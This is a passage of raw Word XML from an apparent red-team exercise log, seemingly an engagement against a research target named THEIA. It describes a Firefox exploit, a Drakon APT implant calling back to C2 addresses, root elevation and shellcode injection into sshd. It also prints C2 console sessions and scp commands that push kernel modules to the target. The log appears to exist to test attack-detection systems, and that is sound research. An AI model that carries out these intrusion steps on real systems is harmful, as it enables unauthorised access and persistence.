    <w:p w14:paraId="2894D1CA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7040F644" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07347E46" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Enter IP address 77.138.117.150</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DD08BE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A5152C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452A2302" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Enter Port 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8DDE63" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Press Connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699973EC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F011D98" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E37EC1" w14:textId="2A16DF7B" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="0097593C" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>App crashed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A89DF4" w14:textId="083D9F07" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="154" w:name="_Toc12600084"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>14:48 -- TA1 THEIA 1 -- Firefox Drakon APT BinFmt-Elevate Inject</w:t>
      </w:r>
      <w:bookmarkEnd w:id="154"/>
    </w:p>
    <w:p w14:paraId="0CC04866" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Repeated the attack from TRACE against THEIA.  During the attack, installed the elevate driver and another driver as benign activity.  Exploit Firefox by browsing to www.nhra.com.  This resulted in C2 connections to 189.141.204.211:80 and 208.203.20.42:80.  The attacker used elevate to gain root privileges.  The attacker got the processing listing, found the sshd process, and injected into it using a new process injection technique.  The shellcode injected into the sshd process wrote a file, sshdlog, to disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A631B8" w14:textId="1ED2D5D3" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="155" w:name="_51lo6twkaccb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="156" w:name="_Toc12600085"/>
      <w:bookmarkEnd w:id="155"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="156"/>
    </w:p>
    <w:p w14:paraId="4DCE3051" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-theia-target-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.110</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Ubuntu 12.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A207069" w14:textId="5C618E48" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="157" w:name="_pj3hs5h9a320" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="158" w:name="_Toc12600086"/>
      <w:bookmarkEnd w:id="157"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="158"/>
    </w:p>
    <w:p w14:paraId="498555F1"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Firefox backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3EEAAD"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Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BDA671"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BinFmt-Elevate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A734B7" w14:textId="2F1B0297" w:rsidR="00A351B2"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Inject2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2288485C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name="_Toc12600087"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>
    </w:p>
    <w:p w14:paraId="614CBAC6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A63776" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Firefox -&gt; www.nhra.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAA9B89" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="121D9F4E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>C2 connection is almost unusable, long delays</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15752039" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4961D69D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kududyn-ProLiant-SL170s-G6:/e5/oc2_theia# date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49732FCF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Wed May 15 14:47:41 EDT 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FDEBD1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kududyn-ProLiant-SL170s-G6:/e5/oc2_theia# python ocMain.py --http 8108</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424CA60A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Must install flask to use snuggly, ignoring...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118AA3CE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>projects/build_drakon.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBAC4F8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Default interface: 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E231B3D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Listening for connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D8AF08" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            0.0.0.0:8108  [HTTP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABF7E66" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F610D9C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6953EB91" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538107F8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [linux] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181B9D52" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Initializing new linux console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766F1FAA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## NEW CONSOLE READY [L1] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201EA489" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="529AE546" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5A8F8A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L1        128.55.12.167:55430 --&gt;   128.55.12.167:8108  [HTTP]  Wed May 15 14:47:51 2019        active 44s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C416431" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con L1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AD9B71" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663130C4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ta1-theia-target-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0828ACA4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B73D676" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F74043" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;getpid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39692A8C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] pid: 534051</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12921F65" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACB13B3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] uid: 1003 admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBF81BC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CE0DC9D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097C72A4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;elevate shm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0646BDF2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Elevate current process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F1A183" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] elevate success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACE0C0F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB183BF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] uid: 1003 admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3F1EAB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRPr="00FC027E" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D74C1A" w14:textId="7B9CC786" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="160" w:name="_Toc12600088"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Benign Activity Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="160"/>
    </w:p>
    <w:p w14:paraId="0E8F7609" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>14:51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B00306" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:/e5/dist$ scp read_scan_theia.ko admin@128.55.12.110:./read_scan.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B70C928" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>The authenticity of host '128.55.12.110 (128.55.12.110)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E1E469" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>ECDSA key fingerprint is 2d:81:fb:53:3e:7f:a6:20:f9:77:06:b0:df:95:7a:6b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55048B1A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Are you sure you want to continue connecting (yes/no)? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A59410F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Warning: Permanently added '128.55.12.110' (ECDSA) to the list of known hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D21A368" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">admin@128.55.12.110's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E86A725" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">read_scan_theia.ko                                                                                                                                 100%  176KB 175.8KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC71288" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">kududyn@kududyn-ProLiant-SL170s-G6:/e5/dist$ scp load_helper_theia.ko admin@128.55.12.110:./load_helper.ko                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561EA7F3" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">admin@128.55.12.110's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711DE61F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">load_helper_theia.ko                                                                                                                               100%  175KB 175.5KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23123317" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C3ECEB4" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>14:53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608C7E98" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:/e5/dist$ ssh admin@128.55.12.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E177B2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">admin@128.55.12.110's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB99F69" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.5.0-99-generic x86_64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08255E62" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA283E9" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve"> * Documentation:  https://help.ubuntu.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AB3EDD" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4197671F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">  System information as of Wed May 15 18:53:32 Local time zone must be set--see zic manual page 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685BEAFF" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29533791" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">  System load:  0.56               Processes:           147</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788783F9" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">  Usage of /:   7.2% of 115.37GB   Users logged in:     1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DEE08C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="0097593C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">  Memory usage: 16%                IP address for eth0: 10.0.6.60</w:t>
      </w:r>
    </w:p>
